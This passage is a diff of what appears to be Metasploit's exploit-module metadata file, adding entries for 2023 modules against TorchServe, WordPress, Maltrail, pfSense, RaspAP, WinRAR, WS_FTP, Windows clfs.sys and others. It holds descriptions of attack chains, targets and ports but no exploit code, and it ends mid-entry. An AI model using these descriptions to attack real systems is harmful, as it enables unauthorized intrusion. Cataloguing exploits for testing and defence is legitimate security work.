+    "description": "The PyTorch model server contains multiple vulnerabilities that can be chained together to permit an\n        unauthenticated remote attacker arbitrary Java code execution. The first vulnerability is that the management\n        interface is bound to all IP addresses and not just the loop back interface as the documentation suggests. The\n        second vulnerability (CVE-2023-43654) allows attackers with access to the management interface to register MAR\n        model files from arbitrary servers. The third vulnerability is that when an MAR file is loaded, it can contain a\n        YAML configuration file that when deserialized by snakeyaml, can lead to loading an arbitrary Java class.",
+    "references": [
+      "URL-https://www.oligo.security/blog/shelltorch-torchserve-ssrf-vulnerability-cve-2023-43654",
+      "CVE-2023-43654",
+      "URL-https://github.com/pytorch/serve/security/advisories/GHSA-8fxr-qfr9-p34w",
+      "CVE-2022-1471",
+      "URL-https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2",
+      "URL-https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in",
+      "URL-https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8081,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2023-10-11 16:56:20 +0000",
+    "path": "/modules/exploits/multi/http/torchserver_cve_2023_43654.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/torchserver_cve_2023_43654",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/totaljs_cms_widget_exec": {
    "name": "Total.js CMS 12 Widget JavaScript Code Injection",
    "fullname": "exploit/multi/http/totaljs_cms_widget_exec",
@@ -101071,6 +103163,73 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/wp_plugin_fma_shortcode_unauth_rce": {
+    "name": "Wordpress File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution through shortcode",
+    "fullname": "exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-05-31",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "Mateus Machado Tesser"
+    ],
+    "description": "The Wordpress plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode.\n          This leads to RCE in cases where the allowed MIME type list does not include PHP files.\n          In the worst case, this is available to unauthenticated users, but is also works in an authenticated configuration.\n          File Manager Advanced Shortcode plugin version `2.3.2` and lower are vulnerable.\n          To install the Shortcode plugin File Manager Advanced version `5.0.5` or lower is required to keep the configuration\n          vulnerable. Any user privileges can exploit this vulnerability which results in access to the underlying operating system\n          with the same privileges under which the Wordpress web services run. ",
+    "references": [
+      "CVE-2023-2068",
+      "URL-https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-2068",
+      "PACKETSTORM-172707",
+      "WPVDB-58f72953-56d2-4d86-a49b-311b5fc58056"
+    ],
+    "platform": "Linux,PHP,Unix,Windows",
+    "arch": "cmd, php, x64, x86, aarch64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Unix Command",
+      "Linux Dropper",
+      "Windows Command",
+      "Windows Dropper"
+    ],
+    "mod_time": "2023-07-06 10:09:51 +0000",
+    "path": "/modules/exploits/multi/http/wp_plugin_fma_shortcode_unauth_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/wp_plugin_fma_shortcode_unauth_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/wp_plugin_modern_events_calendar_rce": {
    "name": "Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution",
    "fullname": "exploit/multi/http/wp_plugin_modern_events_calendar_rce",
@@ -104637,6 +106796,66 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/php/jorani_path_trav": {
+    "name": "Jorani unauthenticated Remote Code Execution",
+    "fullname": "exploit/multi/php/jorani_path_trav",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-01-06",
+    "type": "exploit",
+    "author": [
+      "RIOUX Guilhem (jrjgjk)"
+    ],
+    "description": "This module exploits an unauthenticated Remote Code Execution in Jorani prior to 1.0.2.\n          It abuses 3 vulnerabilities: log poisoning and redirection bypass via header spoofing, then it uses path traversal to trigger the vulnerability.\n          It has been tested on Jorani 1.0.0.",
+    "references": [
+      "CVE-2023-26469",
+      "URL-https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Jorani < 1.0.2"
+    ],
+    "mod_time": "2023-08-18 15:40:58 +0000",
+    "path": "/modules/exploits/multi/php/jorani_path_trav.rb",
+    "is_install_path": true,
+    "ref_name": "multi/php/jorani_path_trav",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/php/php_unserialize_zval_cookie": {
    "name": "PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)",
    "fullname": "exploit/multi/php/php_unserialize_zval_cookie",
@@ -108286,7 +110505,7 @@
      "SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware",
      "SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox"
    ],
-    "mod_time": "2020-12-07 01:55:18 +0000",
+    "mod_time": "2023-08-09 00:22:57 +0000",
    "path": "/modules/exploits/solaris/ssh/pam_username_bof.rb",
    "is_install_path": true,
    "ref_name": "solaris/ssh/pam_username_bof",
@@ -109527,6 +111746,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_unix/http/maltrail_rce": {
+    "name": "Maltrail Unauthenticated Command Injection",
+    "fullname": "exploit/unix/http/maltrail_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-07-31",
+    "type": "exploit",
+    "author": [
+      "Ege BALCI <egebalci@pm.me>",
+      "Chris Wild"
+    ],
+    "description": "Maltrail is a malicious traffic detection system, utilizing publicly\n          available blacklists containing malicious and/or generally suspicious trails.\n          The Maltrail versions < 0.54 is suffering from a command injection vulnerability.\n          The `subprocess.check_output` function in `mailtrail/core/http.py` contains\n          a command injection vulnerability in the `params.get(\"username\")` parameter.\n          An attacker can exploit this vulnerability by injecting arbitrary OS commands\n          into the username parameter. The injected commands will be executed with the\n          privileges of the running process. This vulnerability can be exploited remotely\n          without authentication.\n\n          Successfully tested against Maltrail versions 0.52 and 0.53.",
+    "references": [
+      "EDB-51676",
+      "URL-https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/",
+      "URL-https://github.com/stamparm/maltrail/issues/19146"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 8338,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-08-16 16:52:48 +0000",
+    "path": "/modules/exploits/unix/http/maltrail_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/http/maltrail_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_unix/http/pfsense_clickjacking": {
    "name": "Clickjacking Vulnerability In CSRF Error Page pfSense",
    "fullname": "exploit/unix/http/pfsense_clickjacking",
@@ -109569,6 +111850,67 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_unix/http/pfsense_config_data_exec": {
+    "name": "pfSense Restore RRD Data Command Injection",
+    "fullname": "exploit/unix/http/pfsense_config_data_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-03-18",
+    "type": "exploit",
+    "author": [
+      "Emir Polat"
+    ],
+    "description": "This module exploits an authenticated command injection vulnerabilty in the \"restore_rrddata()\" function of\n          pfSense prior to version 2.7.0 which allows an authenticated attacker with the  \"WebCfg - Diagnostics: Backup & Restore\"\n          privilege to execute arbitrary operating system commands as the \"root\" user.\n\n          This module has been tested successfully on version 2.6.0-RELEASE.",
+    "references": [
+      "CVE-2023-27253",
+      "URL-https://redmine.pfsense.org/issues/13935",
+      "URL-https://github.com/pfsense/pfsense/commit/ca80d18493f8f91b21933ebd6b714215ae1e5e94"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2023-04-08 04:51:31 +0000",
+    "path": "/modules/exploits/unix/http/pfsense_config_data_exec.rb",
+    "is_install_path": true,
+    "ref_name": "unix/http/pfsense_config_data_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "config-changes",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_unix/http/pfsense_diag_routes_webshell": {
    "name": "pfSense Diag Routes Web Shell Upload",
    "fullname": "exploit/unix/http/pfsense_diag_routes_webshell",
@@ -110037,6 +112379,68 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_unix/http/raspap_rce": {
+    "name": "RaspAP Unauthenticated Command Injection",
+    "fullname": "exploit/unix/http/raspap_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-07-31",
+    "type": "exploit",
+    "author": [
+      "Ege BALCI <egebalci@pm.me>",
+      "Ismael0x00"
+    ],
+    "description": "RaspAP is feature-rich wireless router software that just works\n          on many popular Debian-based devices, including the Raspberry Pi.\n          A Command Injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows\n          unauthenticated attackers to execute arbitrary commands in the context of the user running RaspAP via the cfg_id\n          parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.\n\n          Successfully tested against RaspAP 2.8.0 and 2.8.7.",
+    "references": [
+      "CVE-2022-39986",
+      "URL-https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2",
+      "URL-https://github.com/advisories/GHSA-7c28-wg7r-pg6f"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-08-10 10:10:02 +0000",
+    "path": "/modules/exploits/unix/http/raspap_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/http/raspap_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_unix/http/schneider_electric_net55xx_encoder": {
    "name": "Schneider Electric Pelco Endura NET55XX Encoder",
    "fullname": "exploit/unix/http/schneider_electric_net55xx_encoder",
@@ -120508,7 +122912,7 @@
      "Backup Exec 16 (16.0 / revision 9.2), Windows <= 7 x64",
      "Backup Exec 16 (16.0 / revision 9.2), Windows <= 7 x86"
    ],
-    "mod_time": "2021-02-19 20:35:33 +0000",
+    "mod_time": "2023-07-14 12:46:26 +0000",
    "path": "/modules/exploits/windows/backupexec/ssl_uaf.rb",
    "is_install_path": true,
    "ref_name": "windows/backupexec/ssl_uaf",
@@ -136566,6 +138970,58 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/fileformat/greenshot_deserialize_cve_2023_34634": {
+    "name": "Greenshot .NET Deserialization Fileformat Exploit",
+    "fullname": "exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-07-26",
+    "type": "exploit",
+    "author": [
+      "p4r4bellum",
+      "bwatters-r7"
+    ],
+    "description": "There exists a .NET deserialization vulnerability in Greenshot version 1.3.274\n          and below.  The deserialization allows the execution of commands when a user opens\n          a Greenshot file.  The commands execute under the same permissions as the Greenshot\n          service.  Typically, is the logged in user.",
+    "references": [
+      "CVE-2023-34634",
+      "EDB-51633"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows"
+    ],
+    "mod_time": "2023-08-17 08:48:42 +0000",
+    "path": "/modules/exploits/windows/fileformat/greenshot_deserialize_cve_2023_34634.rb",
+    "is_install_path": true,
+    "ref_name": "windows/fileformat/greenshot_deserialize_cve_2023_34634",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/fileformat/gsm_sim": {
    "name": "GSM SIM Editor 5.15 Buffer Overflow",
    "fullname": "exploit/windows/fileformat/gsm_sim",
@@ -136816,7 +139272,7 @@
      "HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]",
      "Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-07-14 12:46:26 +0000",
    "path": "/modules/exploits/windows/fileformat/homm3_h3m.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/homm3_h3m",
@@ -140553,7 +143009,7 @@
      "VLC 2.2.8 on Windows 10 x86",
      "VLC 2.2.8 on Windows 10 x64"
    ],
-    "mod_time": "2022-04-19 20:42:23 +0000",
+    "mod_time": "2023-07-14 12:46:26 +0000",
    "path": "/modules/exploits/windows/fileformat/vlc_mkv.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/vlc_mkv",
@@ -140971,6 +143427,58 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/fileformat/winrar_cve_2023_38831": {
+    "name": "WinRAR CVE-2023-38831 Exploit",
+    "fullname": "exploit/windows/fileformat/winrar_cve_2023_38831",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-08-23",
+    "type": "exploit",
+    "author": [
+      "Alexander \"xaitax\" Hagenah"
+    ],
+    "description": "This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its\n          embedded document, the decoy document is executed, leading to code execution.",
+    "references": [
+      "CVE-2023-38831",
+      "URL-https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/",
+      "URL-https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/"
+    ],
+    "platform": "Windows",
+    "arch": "x64, x86",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows"
+    ],
+    "mod_time": "2023-09-07 22:01:49 +0000",
+    "path": "/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb",
+    "is_install_path": true,
+    "ref_name": "windows/fileformat/winrar_cve_2023_38831",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/fileformat/winrar_name_spoofing": {
    "name": "WinRAR Filename Spoofing",
    "fullname": "exploit/windows/fileformat/winrar_name_spoofing",
@@ -150890,6 +153398,66 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_windows/http/lg_simple_editor_rce": {
+    "name": "LG Simple Editor Remote Code Execution",
+    "fullname": "exploit/windows/http/lg_simple_editor_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-08-24",
+    "type": "exploit",
+    "author": [
+      "rgod",
+      "Ege Balcı <egebalci@pm.me>"
+    ],
+    "description": "This Metasploit module exploits broken access control and directory traversal\n          vulnerabilities in LG Simple Editor software for gaining code execution.\n          The vulnerabilities exist in versions of LG Simple Editor prior to v3.21.\n          By exploiting this flaw, an attacker can upload and execute a malicious JSP\n          payload with the SYSTEM user permissions.",
+    "references": [
+      "ZDI-23-1204",
+      "CVE-2023-40498"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "LG Simple Editor <= v3.21"
+    ],
+    "mod_time": "2023-09-07 17:00:17 +0000",
+    "path": "/modules/exploits/windows/http/lg_simple_editor_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/lg_simple_editor_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_windows/http/mailenable_auth_header": {
    "name": "MailEnable Authorization Header Buffer Overflow",
    "fullname": "exploit/windows/http/mailenable_auth_header",
@@ -152122,17 +154690,23 @@
    "disclosure_date": "2016-02-04",
    "type": "exploit",
    "author": [
+      "Ege BALCI <egebalci@pm.me>",
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n        The application has a file upload vulnerability that can be exploited by an\n        unauthenticated remote attacker to execute code as the SYSTEM user.\n        Two servlets are vulnerable, FileUploadController (located at\n        /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).\n        This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and\n        1.1.0.13.",
+    "description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n          The application has multiple vulnerabilities that can allow an unauthenticated remote\n          attacker to execute code as SYSTEM user. Vulnerabilities include authentication bypass,\n          SQL injection, arbitrary file upload, and privilege escalation across various versions.\n          This module is able to spawn a meterpreter session by chaining together two specific\n          vulnerabilities inside the FileUploadController and MyHandlerInterceptor classes.\n          This module has been tested with versions 1.5.0.2, 1.4.0.17, 1.1.0.13, 1.7.0.12, and 1.7.0.1.",
    "references": [
+      "ZDI-23-920",
+      "ZDI-23-918",
+      "CVE-2023-38096",
+      "CVE-2023-38098",
      "CVE-2016-1525",
      "US-CERT-VU-777024",
      "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt",
-      "URL-https://seclists.org/fulldisclosure/2016/Feb/30"
+      "URL-https://seclists.org/fulldisclosure/2016/Feb/30",
+      "URL-https://kb.netgear.com/000065707/Security-Advisory-for-Multiple-Vulnerabilities-on-the-ProSAFE-Network-Management-System-PSV-2023-0024-PSV-2023-0025"
    ],
    "platform": "Windows",
-    "arch": "x86",
+    "arch": "x86, x64",
    "rport": 8080,
    "autofilter_ports": [
      80,
@@ -152152,7 +154726,7 @@
    "targets": [
      "NETGEAR ProSafe Network Management System 300 / Windows"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-08-02 18:03:57 +0000",
    "path": "/modules/exploits/windows/http/netgear_nms_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/http/netgear_nms_rce",
@@ -152160,6 +154734,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -154284,6 +156868,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/http/smartermail_rce": {
+    "name": "SmarterTools SmarterMail less than build 6985 - .NET Deserialization Remote Code Execution",
+    "fullname": "exploit/windows/http/smartermail_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-04-17",
+    "type": "exploit",
+    "author": [
+      "Soroush Dalili",
+      "1F98D",
+      "Ismail E. Dawoodjee"
+    ],
+    "description": "This module exploits a vulnerability in the SmarterTools SmarterMail\n          software for version numbers <= 16.x or for build numbers < 6985.\n          The vulnerable versions and builds expose three .NET remoting endpoints\n          on port 17001, namely /Servers, /Mail and /Spool. For example, a\n          typical installation of SmarterMail Build 6970 will have the /Servers\n          endpoint exposed to the public at tcp://0.0.0.0:17001/Servers, where\n          serialized .NET commands can be sent through a TCP socket connection.\n\n          The three endpoints perform deserialization of untrusted data\n          (CVE-2019-7214), allowing an attacker to send arbitrary commands\n          to be deserialized and executed. This module exploits this vulnerability\n          to perform .NET deserialization attacks, allowing remote code execution\n          for any unauthenticated user under the context of the SYSTEM account.\n          Successful exploitation results in full administrative control of the\n          target server under the NT AUTHORITY\\SYSTEM account.\n\n          This vulnerability was patched in Build 6985, where the 17001 port is\n          no longer publicly accessible, although it can be accessible locally\n          at 127.0.0.1:17001. Hence, this would still allow for a privilege\n          escalation vector if the server is compromised as a low-privileged user.",
+    "references": [
+      "CVE-2019-7214",
+      "EDB-49216",
+      "URL-https://research.nccgroup.com/2019/04/16/technical-advisory-multiple-vulnerabilities-in-smartermail/"
+    ],
+    "platform": "Windows",
+    "arch": "cmd, x86, x64",
+    "rport": 9998,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows Command",
+      "x86/x64 Windows CmdStager"
+    ],
+    "mod_time": "2023-07-09 07:25:09 +0000",
+    "path": "/modules/exploits/windows/http/smartermail_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/smartermail_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/solarwinds_fsm_userlogin": {
    "name": "Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability",
    "fullname": "exploit/windows/http/solarwinds_fsm_userlogin",
@@ -155385,6 +158033,67 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/http/ws_ftp_rce_cve_2023_40044": {
+    "name": "Progress Software WS_FTP Unauthenticated Remote Code Execution",
+    "fullname": "exploit/windows/http/ws_ftp_rce_cve_2023_40044",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-09-27",
+    "type": "exploit",
+    "author": [
+      "sfewer-r7"
+    ],
+    "description": "This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code\n          execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP Server\n          prior to 2020.0.4 (version 8.7.4) and 2022.0.2 (version 8.8.2) are vulnerable to this issue. The vulnerability\n          was originally discovered by AssetNote.",
+    "references": [
+      "CVE-2023-40044",
+      "URL-https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis",
+      "URL-https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023",
+      "URL-https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows"
+    ],
+    "mod_time": "2023-10-04 09:39:25 +0000",
+    "path": "/modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/ws_ftp_rce_cve_2023_40044",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/xampp_webdav_upload_php": {
    "name": "XAMPP WebDAV PHP Upload",
    "fullname": "exploit/windows/http/xampp_webdav_upload_php",
@@ -158082,7 +160791,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2023-05-25 12:45:30 +0000",
+    "mod_time": "2023-07-21 15:34:49 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_comhijack.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_comhijack",
@@ -158137,7 +160846,7 @@
    "targets": [
      "Windows x64"
    ],
-    "mod_time": "2023-05-25 12:45:30 +0000",
+    "mod_time": "2023-07-21 15:34:49 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_dotnet_profiler",
@@ -158703,7 +161412,7 @@
      "TheWack0lian",
      "OJ Reeves"
    ],
-    "description": "This module abuses the Capcom.sys kernel driver's function that allows for an\n            arbitrary function to be executed in the kernel from user land. This function\n            purposely disables SMEP prior to invoking a function given by the caller.\n            This has been tested on Windows 7, 8.1 and Windows 10 (x64).",
+    "description": "This module abuses the Capcom.sys kernel driver's function that allows for an\n            arbitrary function to be executed in the kernel from user land. This function\n            purposely disables SMEP prior to invoking a function given by the caller.\n            This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.\n            Note that builds after 22000.194 contain deny lists that prevent this driver from loading.",
    "references": [
      "URL-https://twitter.com/TheWack0lian/status/779397840762245124"
    ],
@@ -158717,9 +161426,9 @@

    ],
    "targets": [
-      "Windows x64 (<= 10)"
+      "Windows x64"
    ],
-    "mod_time": "2023-05-25 12:45:30 +0000",
+    "mod_time": "2023-09-08 13:05:44 +0000",
    "path": "/modules/exploits/windows/local/capcom_sys_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/local/capcom_sys_exec",
@@ -159864,6 +162573,60 @@
    ],
    "needs_cleanup": null
  },
+  "exploit_windows/local/cve_2023_28252_clfs_driver": {
+    "name": "Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability",
+    "fullname": "exploit/windows/local/cve_2023_28252_clfs_driver",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": "2023-04-11",
+    "type": "exploit",
+    "author": [
+      "Ricardo Narvaja",
+      "Esteban.kazimirow",
+      "jheysel-r7"
+    ],
+    "description": "A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on\n            Windows 10 21H2, Windows 11 21H2 and Windows Server 20348 operating systems.\n\n            The clfs.sys driver contains a function CreateLogFile that is used to create\n            open and edit '*.blf' (base log format) files. Inside a .blf file there are multiple blocks of data which\n            contain checksums to verify the integrity of the .blf file and to ensure the file looks and acts like a\n            .blf file. However, these files can be edited with CreateFileA or with fopen and then modified with\n            WriteFile or fwrite respectively in order to change the contents of the file and update their checksums accordingly.\n\n            This exploit makes use to two different kinds of specially crafted .blf files that are edited using the technique\n            mentioned above. There are multiple spray .blf files. The spray .blf files are specially crafted to initiate an out of\n            bounds read which reads from a contiguous block of memory. The block of memory it reads from contains a read-write pipe\n            that points to the address of the second type of .blf file - the trigger .blf file. The trigger .blf file is specially\n            crafted read the SYSTEM token and write it in the process of the exploit to achieve the local privilege escalation.\n\n            The exploits creates a controlled memory space by first looping over the CreatePipe function to\n            to create thousands of read-write pipes (which take up 